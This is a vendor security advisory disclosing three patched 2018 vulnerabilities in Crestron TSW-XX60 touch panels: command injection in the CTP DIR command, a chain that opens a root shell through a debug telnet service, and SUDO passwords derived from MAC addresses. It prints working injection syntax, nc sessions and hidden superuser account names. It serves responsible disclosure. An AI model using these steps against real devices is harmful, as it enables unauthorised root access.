Home  >  Research  >  Security Advisory: Crestr…

Security Advisory: Crestron TSW-XX60 Touch Panel Devices Remote Code Execution Vulnerabilities

Written By: Steven Patterson

Crestron produces touchscreen devices, such as the TSW-XX60 series, which can be used to schedule meeting rooms in corporate offices. After the release of a recent device firmware update (which addressed several reported vulnerabilities), Security Compass is publishing the following security advisory.

Two remote code execution vulnerabilities and one elevation of privilege vulnerability were discovered and reported to Crestron by Security Compass’ Advisory team. The related technical details are now being disclosed, following Crestron’s latest patch that successfully remediated all reported issues.

The above vulnerabilities were reported to Crestron by Security Compass (Jackson Thuraisamy) in March 2018, and an active dialogue toward remediation continued until the release of patches in May 2018.

Unauthenticated Remote Code Execution via Command Injection in Crestron Terminal Protocol (CTP)

Identifier: CVE-2018–11229

Vulnerability Details

A command-injection vulnerability existed in the Crestron TSW-XX60 touch panels that could be exploited through the CTP administrative interface open on port 41795. This Telnet-like text console is used by the Crestron Toolbox software to manage the devices. This interface does not list commands that could be used to directly access the underlying Android OS.The CTP DIR command was vulnerable to command injection using a crafted command line payload with shell metacharacters. Output from the commands injected could be redirected into a text file on the device and read by adversaries.

Technical Description

The syntax of the DIR command allows a path to be specified:

DIR User/schedulingpanel

In the back end, the command being executed in the Android system follows:

ls -le "/mnt/sdcard/ROMDISK/User/schedulingpanel"

An adversary could modify the query to execute a command, such as the following:

ls -le "/mnt/sdcard/ROMDISK/User"; whoami > "/mnt/sdcard/ROMDISK/output.txt"

The built-in TYPE command could then be used to read the standard output of the whoami command:

TYPE output.txt

The base /mnt/sdcard/ROMDISK path could be discovered using built-in CTP commands

Unauthenticated Remote Code Execution via Bash Shell Service in Crestron Terminal Protocol (CTP)

Identifier: CVE-2018–11228

Vulnerability Details

The Crestron TSW-XX60 panels have an administrative interface open on port 41795 (Crestron Terminal Protocol). This Telnet-like text console is used by the Crestron Toolbox software to manage the touch panel devices. This interface does not list commands that could be used to directly access the underlying Android OS.

Two conditions existed on the touch panel device that allowed an adversary to gain remote code execution:

  1. A system service, called telnetd_debug, was capable of binding to a Bash shell on port 23 (this service is disabled by default).
  2.  An undocumented administrative command (RESTARTSERVICE) could be used to start services.

These conditions could be leveraged by disabling the running telnetd service with the TELNETPORT OFF command and then starting the telnet_debug service with the RESTARTSERVICE command. When this chain of tasks was performed, an interactive shell could be obtained with the ability to run arbitrary system commands on the device. If the user does not have administrative privileges to use a terminal command, they could leverage the built-in SUDO command to elevate to root privileges (see CVE-2018-13341 below).

Technical Description

The Crestron Toolbox Protocol can be connected to by accessing port 41795 on the TSW-XX60 device. The user would be met with a command line interface.

[email protected]:~$ nc -C 41795
TSW-760 Control Console
Telnet Port: On

The user could then disable the running Telnet service and start the telnetd_debug service.

Telnet Port: Off
TSW-760> RESTARTSERVICE telnetd_debug
Service telnetd_debug restarted

The telnetd_debug service could then be connected to by accessing port 23. In response, the user received an interactive Bash shell with which commands could be run on the target device as the current running user (i.e. root).

[email protected]:~$ nc -C 23
bash-3.2# whoami
bash-3.2# pwd
bash-3.2# uname -a
Linux TSW760 3.10.33 #3 SMP PREEMPT Mon Nov 6 16:52:32 EST 2017 armv7l GNU/Linux

Elevation of Privilege in Crestron Terminal Protocol

Identifier: CVE-2018–13341

Vulnerability Details

Crestron TSW-XX60 touch panel devices were affected by a privilege-escalation vulnerability that could be exploited through access to administrative credentials in the device firmware. If an adversary gained access to system binaries (e.g. by obtaining the firmware), they could leverage the “supwdgenerator” binary to generate administrative passwords for the built-in SUDO command.

This command allowed lower-privileged users to provide credentials that enabled them to run Crestron Terminal Protocol (CTP) commands as an administrator after authentication. After inspecting the device firmware and generating the correct passwords, an adversary could execute commands on the device as an administrator.

Technical Description

The HELP documentation in CTP provided information about commands and the privilege required to execute them. As shown below, the supported user roles are Administrator, Programmer, and Operator.

GETANALOGJOIN   Programmer    Get a analog join value
GETAUDITLOG     Administrator Retrieve the audit log.
GETDIGITALJOIN  Programmer    Get a digital join value
GETPAsswordrule Administrator Display password rules
GETSERIALJOIN   Programmer    Get a serial join value
PING            Operator      Ping remote node
POEPLUS         Programmer    Enable/disable 24V
PRINTAUDITLOG   Administrator Print the audit log.
PROJECTREFresh  Administrator Sets time to Refresh project.
PROJECTRESTART  Programmer    Restart the user project.

One of the commands (SUDO) allowed a lower-privileged user to run commands as an Administrator. This was done by authenticating with a username and password.

SUDO cmd [param1 param2 ...]
cmd: command to execute.
param1,param2,…: parameters for the command.
Username: idontknow
Password: *********
Invalid user name or password..

Firmware analysis indicated that two additional usernames (crengsuperuser and crsuperuser) were supported, and their passwords were derived from the MAC address of the Ethernet adapter.

An adversary with access to the supwdgenerator application could run it with the command line used by the ctpd application. An example follows:

[email protected]:~$ ./supwdgenerator AA.BB.CC.DD.EE.FF -ForEngineerOnly wDyB[redacted]A8

The adversary could then use the password to authenticate with the SUDO command, as shown below:

Username: crengsuperuser
Password: ****************
Directory of 
[DIR] 02–07–18 11:27:41 ROMDISK
[DIR] 09–29–17 18:07:06 SSHBanner
[DIR] 02–07–18 11:21:16 SYS

Disclosure Process

  • Following Security Compass’s responsible disclosure process, Crestron PSIRT was notified of the vulnerabilities on March 9, 2018.
  • A response was promptly received from Crestron that they were investigating the matter with their engineering team.
  • Crestron acknowledged that the vulnerabilities were true positives and that they were investigating remediation.
  • A general release patch was available on May 30, 2018.

To learn more about Security Compass’ Verification Services, read about them here: https://www.securitycompass.com/advisory/services/verification/.

Advisory Labs

Steven Patterson
Security Consultant
Steven Patterson
Steven Patterson began his career as a game designer. After working on a cybersecurity-themed game, the experience got him interested in the subject matter. He spent a year learning and doing independent research, including publishing articles about Windows exploit development and fuzzing on his website shogunlab.com, before coming to work as a consultant with Security Compass.

More Articles by Steve

Other Articles about Topic

Stay Up To Date

Get the latest cybersecurity news and updates delivered straight to your inbox.
Sign up today.